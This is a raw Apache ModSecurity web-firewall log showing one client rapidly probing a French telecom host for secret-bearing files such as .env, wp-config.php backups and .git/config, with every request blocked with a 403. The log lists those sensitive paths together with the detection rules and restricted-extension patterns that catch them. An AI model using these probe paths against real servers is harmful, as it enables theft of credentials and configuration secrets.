[Mon May 11 20:55:55.408747 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agImOzP5Q_-MBliRCAxnTgAAAAo"]
[Mon May 11 20:55:55.436776 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/user/.env"] [unique_id "agImO1NddpkriGUb6ZV2wgAAAQw"]
[Mon May 11 20:55:55.437002 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/user/.env"] [unique_id "agImO1NddpkriGUb6ZV2wgAAAQw"]
[Mon May 11 20:55:55.437278 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/user/.env"] [unique_id "agImO1NddpkriGUb6ZV2wgAAAQw"]
[Mon May 11 20:55:55.478659 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agImO_jVc-A-CSptvm1xXgAAAEg"]
[Mon May 11 20:55:55.478910 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agImO_jVc-A-CSptvm1xXgAAAEg"]
[Mon May 11 20:55:55.479223 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agImO_jVc-A-CSptvm1xXgAAAEg"]
[Mon May 11 20:55:55.480239 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agImOzP5Q_-MBliRCAxnUAAAABI"]
[Mon May 11 20:55:55.480451 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agImOzP5Q_-MBliRCAxnUAAAABI"]
[Mon May 11 20:55:55.480829 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agImOzP5Q_-MBliRCAxnUAAAABI"]
[Mon May 11 20:55:55.550779 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agImO_jVc-A-CSptvm1xYQAAAEg"]
[Mon May 11 20:55:55.550947 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agImO_jVc-A-CSptvm1xYQAAAEg"]
[Mon May 11 20:55:55.551131 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agImO_jVc-A-CSptvm1xYQAAAEg"]
[Mon May 11 20:55:55.587417 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agImO5Yn-x0CHsbEbP2tpwAAAIg"]
[Mon May 11 20:55:55.587633 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agImO5Yn-x0CHsbEbP2tpwAAAIg"]
[Mon May 11 20:55:55.587924 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agImO5Yn-x0CHsbEbP2tpwAAAIg"]
[Mon May 11 20:55:55.693254 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agImO1NddpkriGUb6ZV2yAAAARE"]
[Mon May 11 20:55:55.693525 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agImO1NddpkriGUb6ZV2yAAAARE"]
[Mon May 11 20:55:55.693780 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agImO1NddpkriGUb6ZV2yAAAARE"]
[Mon May 11 20:55:55.765048 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agImO9eaRXe5lR8y0ZOSyQAAAUI"]
[Mon May 11 20:55:55.765314 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agImO9eaRXe5lR8y0ZOSyQAAAUI"]
[Mon May 11 20:55:55.765703 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agImO9eaRXe5lR8y0ZOSyQAAAUI"]
[Mon May 11 20:55:55.791900 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/wp-content/debug.log"] [unique_id "agImOzP5Q_-MBliRCAxnWwAAAAo"]
[Mon May 11 20:55:55.792261 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-content/debug.log"] [unique_id "agImOzP5Q_-MBliRCAxnWwAAAAo"]
[Mon May 11 20:55:55.792484 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-content/debug.log"] [unique_id "agImOzP5Q_-MBliRCAxnWwAAAAo"]
[Mon May 11 20:55:55.816459 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/wp_mail_smtp.ini"] [unique_id "agImOzP5Q_-MBliRCAxnXgAAAAo"]
[Mon May 11 20:55:55.816745 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp_mail_smtp.ini"] [unique_id "agImOzP5Q_-MBliRCAxnXgAAAAo"]
[Mon May 11 20:55:55.816991 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp_mail_smtp.ini"] [unique_id "agImOzP5Q_-MBliRCAxnXgAAAAo"]
[Mon May 11 20:55:55.865366 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/website/.env"] [unique_id "agImO5Yn-x0CHsbEbP2trwAAAIQ"]
[Mon May 11 20:55:55.865607 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/website/.env"] [unique_id "agImO5Yn-x0CHsbEbP2trwAAAIQ"]
[Mon May 11 20:55:55.865858 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/website/.env"] [unique_id "agImO5Yn-x0CHsbEbP2trwAAAIQ"]
[Mon May 11 20:55:55.910879 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agImO5Yn-x0CHsbEbP2tsAAAAI8"]
[Mon May 11 20:55:55.911226 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agImO5Yn-x0CHsbEbP2tsAAAAI8"]
[Mon May 11 20:55:55.911676 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agImO5Yn-x0CHsbEbP2tsAAAAI8"]
[Mon May 11 20:55:55.912309 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agImO_jVc-A-CSptvm1xbAAAAFU"]
[Mon May 11 20:55:55.912493 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agImO_jVc-A-CSptvm1xbAAAAFU"]
[Mon May 11 20:55:55.912713 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agImO_jVc-A-CSptvm1xbAAAAFU"]
[Mon May 11 20:55:55.939682 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.old"] [unique_id "agImO5Yn-x0CHsbEbP2tsQAAAIg"]
